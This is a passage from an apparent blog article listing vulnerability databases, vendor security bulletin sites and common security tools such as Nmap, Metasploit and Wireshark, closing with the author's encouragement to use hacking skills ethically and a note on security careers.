  11. HTTP://WEB.NVD.NIST.GOV
  12. HTTP://WWW.VUPEN.COM/ENGLISH/SECURITY-ADVISORIES/
  13. HTTP://WWW.VUPEN.COM/BLOG/
  14. HTTP://CVEDETAILS.COM/
  15. HTTP://WWW.RAPID7.COM/VULNDB/INDEX.JSP
  16. HTTP://OVAL.MITRE.ORG/

Product Specific Vulnerability Information

Some of the very popular products in the world require a special attention and therefore you may want to look at the specific security websites directly from vendors. I have kept Linux. Microsoft and apache in this list, however it may apply to any product you may be heavily using.

  1. RED HAT SECURITY AND OTHER UPDATES SITE
  2. MICROSOFT PRODUCTS SECURITY BULLETIN
  3. APACHE FOUNDATION PRODUCTS SECURITY REPOSITORY
  4. UBUNTU SOFTWARE SECURITY CENTER
  5. LINUX SECURITY REPOSITORY

Tools And Programs For Hacking / Security

There are dozens of tools available for doing different types of hacking and tests. Tools are really important to become more productive at your work. Some of the very common tools that are used by hackers are listed here. You may have different choice of tools based on your own comfort.

  1. NMAP
  2. NSS
  3. HPING
  4. TCPDUMP
  5. METASPLOIT
  6. WIRESHARK
  7. NETWORK STUFF
  8. NIKTO

Summary

I have tried to compile some of these resources for my own reference for the journey of learning I am going to start. I am not even at a beginner level of becoming hacker but the knowledge of this field really fascinates me and keeps me motivated for learning more and more. I hope will be able to become successful in this.

A lot of people use their knowledge skills for breaking stuff and stealing. I personally think that doing harm to someone is a weak choice and will not have a good ending. I would recommend not to use your skills for any un-ethical endeavor. A single misuse of your skill may jeopardize your career since most companies do a strict third party background check before they hire a ethical hacker or a security personal.

There are dozens of companies looking for ethical hackers and security professionals. There are really good number of opportunities in this area and its really niche compensation segment. You will be easily able to get a decent job without even acquiring all the expert level skills to become a pro hacker.

Source: fromdev.com